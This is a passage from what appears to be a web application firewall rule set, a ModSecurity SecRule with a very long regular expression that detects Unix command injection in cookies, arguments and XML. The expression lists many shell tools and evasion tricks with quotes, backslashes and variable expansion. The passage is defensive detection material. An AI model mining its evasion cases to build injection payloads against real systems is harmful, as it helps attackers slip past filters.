(?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dg]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))(?:[\s\x0b&\),<>\|]|$).*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*))\b" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:g|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0